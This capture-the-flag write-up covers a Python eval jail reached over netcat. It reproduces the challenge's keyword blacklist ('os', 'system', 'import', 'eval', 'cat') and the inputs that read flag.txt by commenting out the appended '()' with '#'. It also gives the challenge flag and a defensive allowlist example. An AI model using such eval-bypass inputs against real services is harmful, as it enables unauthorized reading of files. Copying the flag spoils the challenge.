We have a netcat interface that we can use to send commands. We need to bypass a filter to execute Python code to read the flag in the same folder as the script. I cleaned it up a little:
```python
#!/usr/bin/python3

banner1 = 'banner1'
banner2 = 'banner2'

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%',
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's',
              'lower', 'upper', 'system', '}', '{' ]

while True:
    ans = input('Break me, shake me!\n\n$ ').strip()
    if any(char in ans for char in blacklist):
        print(f'\n{banner1}\nNaughty naughty..\n')
    else:
        try:
            eval(ans + '()')
            print('WHAT WAS THAT?!\n')
        except:
            print(f"\n{banner2}\nI'm UNBREAKABLE!\n")
```
Any leading or trailing spaces are stripped from our command.
Then the blacklist is applied.
If the blacklist did not block it, `()` is appended to the answer and the result is executed if it's valid Python code.
```
$ open('flag.txt','r').read
WHAT WAS THAT?!
```
```
$ print(open('flag.txt','r').read)#
<built-in method read of _io.TextIOWrapper object at 0x7f1d4ad1f5e0>
WHAT WAS THAT?!
```
Turns out this outputs the read function itself instead of executing it: the trailing `#` turns the appended `()` into a comment, so `read` is never called.
```
$ print(open('flag.txt','r').read())#
HTB{3v4l_0r_3vuln??}
```
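For the defensive side of the same script, the added example below (not part of the challenge code) replays the blacklist check on the inputs from this write-up, parses without running what `eval(ans + '()')` would call at the top level, and contrasts that with an allowlist dispatcher that never evaluates input. The commands `help` and `motd` and all function names are hypothetical, chosen only for illustration.

```python
import ast

# Blacklist copied from the challenge script above.
BLACKLIST = [';', '"', 'os', '_', '\\', '/', '`', ' ', '-', '!', '[', ']',
             '*', 'import', 'eval', 'banner', 'echo', 'cat', '%', '&', '>',
             '<', '+', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0',
             'b', 's', 'lower', 'upper', 'system', '}', '{']

def passes_blacklist(ans):
    """Same substring test as the challenge (True = input is not blocked)."""
    ans = ans.strip()
    return not any(token in ans for token in BLACKLIST)

def outer_callee(ans):
    """Parse (never run) ans + '()' and name the outermost thing called."""
    node = ast.parse(ans.strip() + "()", mode="eval").body
    if not isinstance(node, ast.Call):
        return None
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    return getattr(func, "attr", None)

# Hypothetical commands; the original service defines none.
def cmd_help():
    return "commands: help, motd"

def cmd_motd():
    return "nothing to see here"

ALLOWED = {"help": cmd_help, "motd": cmd_motd}

def safe_dispatch(ans):
    """Look the input up in a fixed table; it is never parsed as code."""
    handler = ALLOWED.get(ans.strip())
    return handler() if handler else "unknown command"

if __name__ == "__main__":
    # Inputs taken from the write-up above.
    for payload in ("open('flag.txt','r').read",
                    "print(open('flag.txt','r').read)#",
                    "print(open('flag.txt','r').read())#"):
        print(payload)
        print("  blacklist lets it through:", passes_blacklist(payload))
        print("  outermost call under eval:", outer_callee(payload))
        print("  allowlist dispatcher says:", safe_dispatch(payload))
```

With a `#` at the end the outermost call is `print` rather than `read`, which is why the second input printed the method object.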